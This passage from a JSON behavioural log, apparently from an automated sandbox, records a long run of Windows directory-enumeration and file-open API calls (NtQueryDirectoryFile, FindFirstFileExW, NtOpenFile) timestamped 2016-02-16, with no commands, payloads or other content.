17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,457", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,467", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,508", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,548", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,588", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,638", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:38,698", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,708", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,748", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,788", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:38,798", "api": 